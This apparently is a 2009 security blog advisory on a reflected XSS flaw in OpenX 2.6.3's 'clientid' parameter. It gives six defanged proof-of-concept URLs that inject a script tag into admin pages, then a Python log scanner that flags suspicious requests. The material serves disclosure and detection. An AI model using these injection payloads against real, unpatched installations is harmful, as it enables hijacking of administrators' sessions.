SecurityGyan

OpenX 2.6.3 clientid parameter XSS Exploits

by Vinod Sharma on May.03, 2009, under MyHacks

###############################################################################

OpenX 2.6.3 clientid parameter XSS Vulnerability

Input passed to the “clientid” parameter in “www/admin/banner-acl.php”, “www/admin/banner-edit.php”, “www/admin/campaign-zone.php”, “www/admin/advertiser-campaigns.php”, “www/admin/campaign-banners.php”, and “www/admin/banner-activate.php” is not properly sanitised before being returned to the user.

Vulnerability fixed in version 2.6.4.

http://www.openx.org/ad-server/download

parameter: clientid

published at: http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar
###############################################################################

exploit1:
filename: www/admin/banner-acl.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-acl.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit2:
filename: www/admin/banner-edit.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-edit.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit3:
filename: www/admin/campaign-zone.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-zone.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit4:
filename: www/admin/advertiser-campaigns.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/advertiser-campaigns.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))

exploit5:
filename: www/admin/campaign-banners.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-banners.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit6:
filename: www/admin/banner-activate.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-activate.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1&value=0

Note: remove the # character from the starting script tag in all PoCs to reproduce this vulnerability.
###############################################################################
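As an added detection example (not part of the advisory or of OpenX itself), the following Python scanner flags access-log requests to the six affected admin scripts whose clientid value is not a plain integer. The log lines are constructed for illustration, and the assumption that a legitimate clientid is numeric comes from the PoCs above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin scripts named in the advisory as reflecting the clientid parameter.
AFFECTED_SCRIPTS = {
    "banner-acl.php", "banner-edit.php", "campaign-zone.php",
    "advertiser-campaigns.php", "campaign-banners.php", "banner-activate.php",
}

# Matches the quoted request line of common/combined log format entries.
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines: one clean request, one with a reflected-script
# attempt against banner-acl.php, and one against a script not in the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/May/2009:10:00:01 +0000] "GET /openx-2.6.3/www/admin/banner-acl.php?clientid=1&campaignid=1&bannerid=1 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [03/May/2009:10:00:07 +0000] "GET /openx-2.6.3/www/admin/banner-acl.php?clientid=1%27%3B%3Cscript%3Ealert(1)%3C/script%3E&campaignid=1 HTTP/1.1" 200 4133',
    '10.0.0.9 - - [03/May/2009:10:00:09 +0000] "GET /openx-2.6.3/www/admin/index.php?clientid=abc HTTP/1.1" 200 900',
]


def check_request(target):
    """Return a finding dict if the request target hits an affected admin script
    with a clientid that is not a plain integer (assumption: OpenX client ids are
    numeric, as in the advisory's PoCs); otherwise return None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if "/www/admin/" not in parts.path or script not in AFFECTED_SCRIPTS:
        return None
    # parse_qs percent-decodes values; keep_blank_values keeps an empty clientid visible.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("clientid", []):
        if not re.fullmatch(r"\d+", value):
            return {"script": script, "clientid": value,
                    "script_tag": "<script" in value.lower()}
    return None


def scan_log(lines):
    """Return a list of (client_ip, finding) pairs for suspicious requests."""
    findings = []
    for line in lines:
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        finding = check_request(m.group("target"))
        if finding:
            findings.append((line.split(" ", 1)[0], finding))
    return findings


if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(ip, finding)
```

Because `check_request` works on the request target alone, the same check can be reused at a reverse proxy or in a WAF rule to reject non-numeric clientid values before they reach the affected scripts.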
